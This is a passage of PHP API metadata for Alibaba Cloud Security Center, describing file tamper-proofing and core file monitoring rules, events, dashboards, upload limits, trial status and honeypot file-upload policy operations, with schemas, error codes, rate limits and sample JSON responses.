'title' => ''], 'title' => '', 'example' => '', ], 'Status' => ['description' => 'The rule status. Valid values:'."\n" ."\n" .'- **0**: disabled.'."\n" .'- **1**: enabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Platform' => ['description' => 'The operating system type. Valid values:'."\n" ."\n" .'- **windows**: Windows'."\n" .'- **linux**: Linux.', 'type' => 'string', 'example' => 'linux', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParameter', 'errorMessage' => 'Illegal parameter, please check the param.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Retrieve file tamper-proofing rule details', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetFileProtectClientRule', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"79CFF74D-E967-5407-8A78-EE03B925****\\",\\n \\"Data\\": {\\n \\"RuleAction\\": \\"pass\\",\\n \\"RuleName\\": \\"test\\",\\n \\"SwitchId\\": \\"USER-CONTAINER-RULE-SWITCH-TYPE_***\\",\\n \\"Id\\": 3119,\\n \\"AlertLevel\\": 1,\\n \\"FileOps\\": [\\n \\"WRITE\\"\\n ],\\n \\"FileTypes\\": [\\n \\"txt\\"\\n ],\\n \\"FilePaths\\": [\\n \\"/usr/*\\"\\n ],\\n \\"ProcPaths\\": [\\n \\"/usr/local/*\\"\\n ],\\n \\"ExcludeUsers\\": [\\n \\"root\\"\\n ],\\n \\"Status\\": 0,\\n \\"Platform\\": \\"linux\\"\\n }\\n}","type":"json"}]', ], 'GetFileProtectClientRuleDashboard' => [ 'summary' => 'Retrieves the overview dashboard of file protection rules.', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas4OHMAP'], ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'Id of the request', 'type' => 'string', 'example' => '69BFFCDE-37D6-5A49-A8BC-BB03AC83****'], 'Data' => [ 'description' => 'The data returned when the API call is successful.', 'type' => 'object', 'properties' => [ 'ProtectedInstancesCount' => ['description' => 'The total number of online web tamper-proofing clients.', 'type' => 'integer', 'format' => 'int32', 'example' => '12', 'title' => ''], 'ProtectedDirectoriesCount' => ['description' => 'The total number of web tamper-proofing rules.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'BindCount' => ['description' => 'The number of bound tamper-proofing licenses.', 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], 'AuthTotal' => ['description' => 'The total number of web tamper-proofing licenses.', 'type' => 'string', 'example' => '5', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParameter', 'errorMessage' => 'Illegal parameter, please check the param.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Retrieve web tamper-proofing overview information', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:GetFileProtectClientDashboard', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"69BFFCDE-37D6-5A49-A8BC-BB03AC83****\\",\\n \\"Data\\": {\\n \\"ProtectedInstancesCount\\": 12,\\n \\"ProtectedDirectoriesCount\\": 3,\\n \\"BindCount\\": 4,\\n \\"AuthTotal\\": \\"5\\"\\n }\\n}","type":"json"}]', ], 'GetFileProtectDashboard' => [ 'summary' => 'Retrieves information about the core file monitoring feature, including the number of effective rules and the installation status of the Security Center agent on servers.', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas4OHMAP'], ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID.', 'type' => 'string', 'example' => '6673D49C-A9AB-40DD-B4A2-B92306701AE7'], 'Data' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'EnableRuleCount' => ['description' => 'The total number of enabled rules.', 'type' => 'integer', 'format' => 'int32', 'example' => '12', 'title' => ''], 'PluginCount' => ['description' => 'The total number of servers on which the Security Center agent is installed.', 'type' => 'integer', 'format' => 'int32', 'example' => '12', 'title' => ''], 'PluginOnlineCount' => ['description' => 'The total number of servers on which the Security Center agent is online.', 'type' => 'integer', 'format' => 'int32', 'example' => '11', 'title' => ''], 'PluginOfflineCount' => ['description' => 'The total number of servers on which the Security Center agent is offline.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"6673D49C-A9AB-40DD-B4A2-B92306701AE7\\",\\n \\"Data\\": {\\n \\"EnableRuleCount\\": 12,\\n \\"PluginCount\\": 12,\\n \\"PluginOnlineCount\\": 11,\\n \\"PluginOfflineCount\\": 1\\n }\\n}","type":"json"}]', 'title' => 'GetFileProtectDashboard', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetFileProtectDashboard'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetFileProtectDashboard', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetFileProtectEvent' => [ 'summary' => 'Retrieves information about core file monitoring events.', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas4OHMAP'], ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the event.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '12', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID.', 'type' => 'string', 'example' => '0B48AB3C-84FC-424D-A01D-B9270EF46038'], 'Data' => [ 'description' => 'The details of the returned data.', 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the asset.', 'type' => 'string', 'example' => '49f1360f-62c8-4b48-a24c-5cc317656419', 'title' => ''], 'RuleName' => ['description' => 'The name of the rule.', 'type' => 'string', 'example' => 'test-000', 'title' => ''], 'FirstTime' => ['description' => 'The timestamp at which the event was first detected.', 'type' => 'integer', 'format' => 'int64', 'example' => '1694576692000', 'title' => ''], 'LatestTime' => ['description' => 'The time when the event last occurred.', 'type' => 'integer', 'format' => 'int64', 'example' => '1694576692000', 'title' => ''], 'Status' => [ 'description' => 'The status of the event. Valid values:'."\n" ."\n" .'- 0: not handled'."\n" ."\n" .'- 1: handled'."\n" ."\n" .'- 2: added to the whitelist', 'type' => 'integer', 'format' => 'int32', 'enum' => ['0', '1', '2'], 'example' => '1', 'title' => '', ], 'ProcPath' => ['description' => 'The path to the process.', 'type' => 'string', 'example' => '/bin/bash33', 'title' => ''], 'FilePath' => ['description' => 'The path to the file.', 'type' => 'string', 'example' => '/usr/local', 'title' => ''], 'CmdLine' => ['description' => 'The event command line.', 'type' => 'string', 'example' => '["touch","/usr/local/aaaa"]', 'title' => ''], 'FilePermission' => ['description' => 'The permissions to run the process.', 'type' => 'string', 'example' => 'rwxr-xr-x', 'title' => ''], 'Operation' => ['description' => 'The operation that the process performed on the file.', 'type' => 'string', 'example' => 'DELETE', 'title' => ''], 'Id' => ['description' => 'The ID of the event.', 'type' => 'integer', 'format' => 'int64', 'example' => '55037', 'title' => ''], 'AlertLevel' => [ 'description' => 'The severity of alerts. Valid values:'."\n" ."\n" .'- 0: does not generate alerts'."\n" ."\n" .'- 1: sends notifications'."\n" ."\n" .'- 2: suspicious'."\n" ."\n" .'- 3: high-risk', 'type' => 'integer', 'format' => 'int32', 'enum' => ['0', '1', '2', '3'], 'example' => '1', 'title' => '', ], 'InstanceName' => ['description' => 'The name of the instance.', 'type' => 'string', 'example' => 'i-wz92q7m5hsbgfhdss***', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the associated instance.', 'type' => 'string', 'example' => '172.16.XX.XX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the associated instance.', 'type' => 'string', 'example' => '10.42.XX.XX', 'title' => ''], 'HandleTime' => ['description' => 'The time when the event was handled.', 'type' => 'integer', 'format' => 'int64', 'example' => '1694576692000', 'title' => ''], 'Remark' => ['description' => 'The remarks.', 'type' => 'string', 'example' => '["test"]', 'title' => ''], 'ProcessId' => ['description' => 'The process ID of the event.', 'type' => 'string', 'example' => '3453', 'title' => ''], 'Platform' => ['description' => 'The type of the operating system. Valid values:'."\n" ."\n" .'- **windows**: Windows'."\n" ."\n" .'- **linux**: Linux', 'type' => 'string', 'example' => 'linux', 'title' => ''], 'UserId' => ['description' => 'User ID of the user who started the current process.', 'type' => 'string', 'example' => '1001', 'title' => ''], 'UserName' => ['description' => 'The username that started the current process.', 'type' => 'string', 'example' => 'test', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0B48AB3C-84FC-424D-A01D-B9270EF46038\\",\\n \\"Data\\": {\\n \\"Uuid\\": \\"49f1360f-62c8-4b48-a24c-5cc317656419\\",\\n \\"RuleName\\": \\"test-000\\",\\n \\"FirstTime\\": 1694576692000,\\n \\"LatestTime\\": 1694576692000,\\n \\"Status\\": 1,\\n \\"ProcPath\\": \\"/bin/bash33\\",\\n \\"FilePath\\": \\"/usr/local\\",\\n \\"CmdLine\\": \\"[\\\\\\"touch\\\\\\",\\\\\\"/usr/local/aaaa\\\\\\"]\\",\\n \\"FilePermission\\": \\"rwxr-xr-x\\",\\n \\"Operation\\": \\"DELETE\\",\\n \\"Id\\": 55037,\\n \\"AlertLevel\\": 1,\\n \\"InstanceName\\": \\"i-wz92q7m5hsbgfhdss***\\",\\n \\"InternetIp\\": \\"172.16.XX.XX\\",\\n \\"IntranetIp\\": \\"10.42.XX.XX\\",\\n \\"HandleTime\\": 1694576692000,\\n \\"Remark\\": \\"[\\\\\\"test\\\\\\"]\\",\\n \\"ProcessId\\": \\"3453\\",\\n \\"Platform\\": \\"linux\\",\\n \\"UserId\\": \\"1001\\",\\n \\"UserName\\": \\"test\\"\\n }\\n}","type":"json"}]', 'title' => 'GetFileProtectEvent', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetFileProtectEvent'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetFileProtectEvent', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetFileProtectEventCount' => [ 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas4OHMAP'], ], 'parameters' => [ [ 'name' => 'Status', 'in' => 'query', 'schema' => [ 'description' => 'The status of the event. Valid values:'."\n" ."\n" .'* 0: unhandled'."\n" .'* 1: handled'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'enum' => ['0', '1'], 'title' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '9B28EC81-2FA7-5097-80D9-0DBE1A3DBD59'], 'Data' => ['description' => 'The data returned if the request is successful.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '16', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'GetFileProtectEventCount', 'summary' => 'Queries the total number of core file monitoring events by filter condition.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetFileProtectEventCount'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetFileProtectEventCount', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"9B28EC81-2FA7-5097-80D9-0DBE1A3DBD59\\",\\n \\"Data\\": 16\\n}","type":"json"}]', ], 'GetFileProtectRule' => [ 'summary' => 'Queries the information about a core file monitoring rule based on the ID of the rule.', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '188625', 'abilityTreeNodes' => ['FEATUREsas4OHMAP'], ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the rule.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '245', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'C0DF9057-67C5-574D-A2D2-0CA9AC74C4D3'], 'Data' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Action' => ['description' => 'The handling method of the rule. Valid values:'."\n" ."\n" .'1. pass: allow'."\n" .'2. alert'."\n", 'type' => 'string', 'example' => 'pass', 'title' => ''], 'RuleName' => ['description' => 'The name of the rule.'."\n", 'type' => 'string', 'example' => 'test-000', 'title' => ''], 'SwitchId' => ['description' => 'The switch ID of the rule.'."\n", 'type' => 'string', 'example' => 'FILE_PROTECT_RULE_SWITCH_TYPE_0000', 'title' => ''], 'Id' => ['description' => 'The ID of the rule.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '44616', 'title' => ''], 'AlertLevel' => ['description' => 'The severity of alerts. Valid values:'."\n" ."\n" .'* 0: does not generate alerts'."\n" .'* 1: sends notifications'."\n" .'* 2: suspicious'."\n" .'* 3: high-risk'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'FileOps' => [ 'description' => 'The operations performed on the files.'."\n", 'type' => 'array', 'items' => ['description' => 'The operation performed on the file. Valid values:'."\n" ."\n" .'1. WRITE'."\n" .'2. READ'."\n" .'3. DELETE'."\n" .'4. RENAME'."\n" .'5. CHMOD: change permissions'."\n", 'type' => 'string', 'example' => 'CHMOD', 'title' => ''], 'title' => '', 'example' => '', ], 'FilePaths' => [ 'description' => 'The paths to the monitored files.'."\n", 'type' => 'array', 'items' => ['description' => 'The path to the monitored file. Wildcard characters are supported.'."\n", 'type' => 'string', 'example' => '/usr/*', 'title' => ''], 'title' => '', 'example' => '', ], 'ProcPaths' => [ 'description' => 'The paths to the monitored processes.'."\n", 'type' => 'array', 'items' => ['description' => 'The path to the monitored process. Wildcard characters are supported.'."\n", 'type' => 'string', 'example' => '/usr/local/*', 'title' => ''], 'title' => '', 'example' => '', ], 'Status' => ['description' => 'The status of the rule. Valid values:'."\n" ."\n" .'1. 0: disabled'."\n" .'2. 1: enabled'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Platform' => ['type' => 'string', 'description' => 'The type of the operating system. Valid values:'."\n" ."\n" .'* **windows**: Windows'."\n" .'* **linux**: Linux', 'example' => 'linux', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"C0DF9057-67C5-574D-A2D2-0CA9AC74C4D3\\",\\n \\"Data\\": {\\n \\"Action\\": \\"pass\\",\\n \\"RuleName\\": \\"test-000\\",\\n \\"SwitchId\\": \\"FILE_PROTECT_RULE_SWITCH_TYPE_0000\\",\\n \\"Id\\": 44616,\\n \\"AlertLevel\\": 0,\\n \\"FileOps\\": [\\n \\"CHMOD\\"\\n ],\\n \\"FilePaths\\": [\\n \\"/usr/*\\"\\n ],\\n \\"ProcPaths\\": [\\n \\"/usr/local/*\\"\\n ],\\n \\"Status\\": 1,\\n \\"Platform\\": \\"linux\\"\\n }\\n}","type":"json"}]', 'title' => 'GetFileProtectRule', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetFileProtectRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetFileProtectRule', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'ClientFileProtect', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:clientfileprotect/{#RuleId}'], ], ], ], ], ], 'GetFileUploadLimit' => [ 'summary' => 'Queries the queries per second (QPS) limit on the files uploaded from the client.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasEX82TR'], ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'result'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '1A975D03-5F49-5354-B2CB-3918D5DA431A'], 'Data' => [ 'description' => 'The data returned if the request is successful.'."\n", 'type' => 'object', 'properties' => [ 'Limit' => ['description' => 'The QPS limit on the files uploaded from the client.'."\n", 'type' => 'string', 'example' => '100', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"1A975D03-5F49-5354-B2CB-3918D5DA431A\\",\\n \\"Data\\": {\\n \\"Limit\\": \\"100\\"\\n }\\n}","type":"json"}]', 'title' => 'GetFileUploadLimit', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetFileUploadLimit'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetFileUploadLimit', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'FileUploadLimit', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:fileuploadlimit'], ], ], ], ], ], 'GetFunctionTrialStatus' => [ 'summary' => 'Get Trial Status', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '140189', 'abilityTreeNodes' => ['FEATUREsas0KX1KI'], ], 'parameters' => [ [ 'name' => 'FunctionName', 'in' => 'query', 'schema' => ['description' => 'The name of the function module.', 'type' => 'string', 'required' => false, 'example' => 'trail_file_detect_api_reward', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'Indicates eligibility. Values:'."\n" ."\n" .'- **0**: Eligible'."\n" .'- **1**: Not eligible'."\n" .'- **2**: Trial ended'."\n" .'- **3**: In trial', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The ID of this call request, which is a unique identifier generated by Alibaba Cloud for this request and can be used to troubleshoot and locate issues.', 'type' => 'string', 'example' => '8B30CCDD-B79A-5844-BE66-F6D51335'."\n" .'XXXX', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": 1,\\n \\"RequestId\\": \\"8B30CCDD-B79A-5844-BE66-F6D51335\\\\nXXXX\\"\\n}","type":"json"}]', 'title' => 'Get Function Trial Eligibility Status', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetFunctionTrialStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetFunctionTrialStatus', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetHoneyPotUploadPolicyInfo' => [ 'summary' => 'Obtains the URL that is used to upload a file to a honeypot.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and the response. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'Accessid' => ['description' => 'The key ID that is required for the file upload.'."\n", 'type' => 'string', 'example' => 'yourAccessKeyID', 'title' => ''], 'Policy' => ['description' => 'The limits that are imposed on the file upload. The limits include the file size.'."\n", 'type' => 'string', 'example' => 'eyJleHBpcmF0aW9uIjoiMjAyMy0wOS0wMVQwMzoyNTozNS44MzZaIiwiY29uZGl0aW9ucyI6W1siY29udGVudC1sZW5ndGgtcmFuZ2UiLDAsMTA0ODU3NjAwXSxbInN0YXJ0cy13aXRoIiwiJGtleSIsIkhPTkVZUE9UX0ZJTEUvMTc2NjE4NTg5NDEwNDY3NV8xNjkzNTM4NDM1N*****************', 'title' => ''], 'Signature' => ['description' => 'The signature that is calculated based on **AccessKeySecret** and **Policy**. When you call an Object Storage Service (OSS) API operation, OSS uses the signature information to verify the POST request.'."\n", 'type' => 'string', 'example' => 'wKPqlFneNTZPn52k2Rz9GTY*****', 'title' => ''], 'Key' => ['description' => 'The full path of the file in OSS. The file is uploaded by calling the OSS PostObject operation.'."\n", 'type' => 'string', 'example' => 'HONEYPOT_FILE/1766185894104675_169********', 'title' => ''], 'Host' => ['description' => 'The request URL during the upload.'."\n", 'type' => 'string', 'example' => 'https://aegis-update-static-file.oss-cn-hangzhou.aliyuncs.com', 'title' => ''], 'Expire' => ['description' => 'The expiration time of the URL. The value is a timestamp. You can use the value to determine whether the URL expires. If the expiration time arrives, you can no longer use the URL to upload files.'."\n", 'type' => 'string', 'example' => '1661443200000', 'title' => ''], 'SecurityToken' => ['description' => 'The security token.'."\n", 'type' => 'string', 'example' => '***', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The HTTP status code returned.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '8C177095-A734-59B2-9409-7D4F26FF****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code that is returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"Accessid\\": \\"yourAccessKeyID\\",\\n \\"Policy\\": \\"eyJleHBpcmF0aW9uIjoiMjAyMy0wOS0wMVQwMzoyNTozNS44MzZaIiwiY29uZGl0aW9ucyI6W1siY29udGVudC1sZW5ndGgtcmFuZ2UiLDAsMTA0ODU3NjAwXSxbInN0YXJ0cy13aXRoIiwiJGtleSIsIkhPTkVZUE9UX0ZJTEUvMTc2NjE4NTg5NDEwNDY3NV8xNjkzNTM4NDM1N*****************\\",\\n \\"Signature\\": \\"wKPqlFneNTZPn52k2Rz9GTY*****\\",\\n \\"Key\\": \\"HONEYPOT_FILE/1766185894104675_169********\\",\\n \\"Host\\": \\"https://aegis-update-static-file.oss-cn-hangzhou.aliyuncs.com\\",\\n \\"Expire\\": \\"1661443200000\\",\\n \\"SecurityToken\\": \\"***\\"\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"8C177095-A734-59B2-9409-7D4F26FF****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'GetHoneyPotUploadPolicyInfo', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetHoneyPotUploadPolicyInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 